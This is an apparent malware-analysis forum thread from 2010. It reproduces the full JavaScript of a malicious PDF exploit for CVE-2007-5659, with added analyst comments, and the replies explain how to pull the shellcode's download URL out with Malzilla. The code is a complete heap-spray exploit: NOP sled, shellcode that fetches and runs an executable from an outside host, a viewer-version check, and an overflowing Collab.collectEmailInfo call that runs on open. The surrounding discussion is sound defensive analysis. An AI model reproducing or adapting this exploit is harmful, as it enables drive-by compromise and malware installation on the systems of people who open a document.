
Title: Please help
Post by: MADY on September 20, 2010, 11:16:10 am
Please, can someone tell me how to decode this code?


// Global holder for the blocks built by ooyS1YUR(). Kept at top level,
// presumably so the allocations stay referenced for the life of the script.
var mM6RItmK = new Array();



// Builds a filler string of a fixed byte size: doubles HydurAUR until it
// covers at least XbGQrcyY bytes (JS strings are UTF-16, so length*2 is the
// byte count), then trims it to XbGQrcyY/2 code units and returns it.
// Note: an empty HydurAUR would never leave the loop.
function yNYJ8yVD(HydurAUR, XbGQrcyY)

{

    // Grow by self-concatenation until the string is at least XbGQrcyY bytes.
    while (HydurAUR.length*2<XbGQrcyY) {

        HydurAUR += HydurAUR;

    }



    // Cut back to exactly XbGQrcyY/2 UTF-16 code units (XbGQrcyY bytes).
    HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);



    return HydurAUR;

}



// Memory-preparation stage (analysis notes). Fills the global array mM6RItmK
// with repeated copies of "filler + payload", sized so that the address
// 0x0c0c0c0c falls inside one of the blocks. Nothing in this function
// executes the payload; it only arranges memory ahead of RYiFEs8K()'s trigger.
function ooyS1YUR()

{

    // Address the block count below is computed against; the same value is
    // used as the oversized argument in RYiFEs8K().
    var jKts_E9h = 0x0c0c0c0c;

    // Shellcode as a %u-escaped UTF-16 string. The trailing run starting at
    // %u7468%u7074 is plain ASCII packed two bytes per unit; per the thread it
    // decodes to the download URL (http://aolcounter.com/ViWK67B/exe.php),
    // which is the indicator an analyst should extract from this sample.
    var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");

    // Size of each block, in bytes (4 MiB).
    var Y9Ib6uuE = 0x400000;

    // Payload size in bytes (two bytes per UTF-16 code unit).
    var xxKaKDUU = i0a7eJNL.length * 2;

    // Bytes of filler so that filler + payload (+0x38, presumably string-object
    // overhead) fills one block exactly.
    var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);

    // Filler pattern: 0x90 bytes (x86 NOP), extended below to XbGQrcyY bytes.
    var HydurAUR = unescape("%u9090%u9090");



    HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);

    // Block count needed to reach 0x0c0c0c0c: (0x0c0c0c0c - 0x400000) / 0x400000.
    // This is not an integer (~47.19), so the loop below runs 48 times.
    var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

   

    for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {

        // Each element is one block: filler followed by the shellcode.
        mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;


    }

}


// Entry logic: gates on the viewer version, then calls the vulnerable API.
// Only versions below 8.1.2, below 7.1, or with a major version below 7
// reach the Collab.collectEmailInfo() call, which the thread identifies as
// CVE-2007-5659. On any other version the function does nothing — a useful
// behavioural tell when running this sample in a sandbox.
function RYiFEs8K()

{

    // app.viewerVersion is the Acrobat JavaScript API's viewer version.
    var XrCU20If = app.viewerVersion.toString();

    // Strip everything but digits; the code assumes the first three digits
    // are then major, minor and patch.
    XrCU20If = XrCU20If.replace(/\D/g,'');





    // Major, minor, patch as one-character strings; the comparisons below
    // rely on loose == / < coercion to numbers.
    var TPWRJTZJ = new Array(

        XrCU20If.charAt(0),

        XrCU20If.charAt(1),

        XrCU20If.charAt(2));





    // (major 8 and version < 8.1.2) or (major 7 and minor < 1) or major < 7
    if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||

        (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||

        (TPWRJTZJ[0] < 7)) {

        // Arrange memory first (see ooyS1YUR).
        ooyS1YUR();

        // Oversized argument: the 0x0c0c0c0c pattern repeated to at least
        // 44952 UTF-16 code units.
        var nabGR_dc = unescape("%u0c0c%u0c0c");

        while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;

        // Vulnerable call (CVE-2007-5659 per the thread); the oversized msg
        // is the trigger on affected versions. Blocking or hooking this API
        // is the detection point for this sample.
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});

    }

}



// Unconditional call at top level: the check-and-trigger runs as soon as the
// document's JavaScript executes (presumably on open).
RYiFEs8K();

Title: Re: Please help
Post by: SysAdMini on September 20, 2010, 11:24:06 am
This is a pdf exploit (CVE-2007-5659).

The URL in the shellcode is http://aolcounter.com/ViWK67B/exe.php.

Domain aolcounter.com doesn't exist anymore.

http://www.malwaredomainlist.com/mdl.php?search=aolcounter&colsearch=All&quantity=50&inactive=on
Title: Re: Please help
Post by: MADY on September 20, 2010, 12:04:14 pm
Thanks for your reply,

Could you please explain how to do it manually, so I can find the URL in the shellcode? I tried Malzilla to decode it, but it produced junk strings after running the unescape sequence.

Please help me find the URL in this code, since I am going to give a demonstration to our people about this.

Thanks in Advance,
MADY

Title: Re: Please help
Post by: GmG on September 20, 2010, 01:04:13 pm
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file


Title: Re: Please help
Post by: SysAdMini on September 20, 2010, 01:34:35 pm
malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file

Instead of "Hex to file" I prefer to copy/paste content to "Hex view" tab.
In most cases you can see the URL at the end of the hex view.
If there is no URL, the shellcode is probably XOR-encoded.
In that case you can enter "http" into the "Strings to find" field, then click the "Find" button.
If Malzilla finds the encoded string "http", it displays the XOR key in the "Key" field.
Now click the "Apply xor" button and you will see the URL in the hex viewer.
Title: Re: Please help
Post by: MADY on September 21, 2010, 07:47:17 am
Thanks a lot SysAdMini, you are the real HERO member of this MDL  :)